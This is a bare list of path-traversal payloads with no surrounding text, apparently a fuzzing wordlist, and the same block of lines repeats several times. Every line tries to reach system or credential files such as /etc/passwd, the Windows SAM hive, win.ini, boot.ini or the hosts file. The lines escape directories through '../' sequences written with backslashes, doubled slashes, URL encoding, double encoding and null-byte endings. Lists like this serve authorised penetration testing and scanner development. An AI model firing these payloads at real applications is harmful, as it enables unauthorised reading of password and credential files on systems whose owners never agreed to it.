%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00
C:\Windows\System32\drivers\etc\hosts
%252e%252e%252f%252e%252e%252fetc/passwd
..\/..\/etc\/passwd
C:\boot.ini
/../../../../../../../../etc/passwd%00
C:\Windows\win.ini
..//..//etc//passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
..\..\etc\passwd
%2e%2e%2f%2e%2e%2fetc/passwd
..\/..\/..\/..\/etc\/passwd
../../../../../../../../../../windows/win.ini%00
//..//..//..//..//..//..//..//..//windows//system32//config//sam
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/system32/config/sam
..\..\..\..\..\..\..\..\..\..\windows\win.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
..//..//..//..//etc//passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/system32\/config\/sam
\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/../../../../../../../../windows/system32/config/sam%00
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/system32/config/sam
\..\..\..\..\..\..\..\..\windows\system32\config\sam
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../etc/passwd
../../../../../../../../../../windows/win.ini
/../../../../../../../../windows/system32/config/sam
//..//..//..//..//..//..//..//..//etc//passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
../../../../etc/passwd%00
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
..//..//..//..//..//..//..//..//..//..//windows//win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/../../../../../../../../etc/passwd
C:\Windows\System32\config\SAM
..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini
../../../../../../../../../../../../../../../../../../../../etc/passwd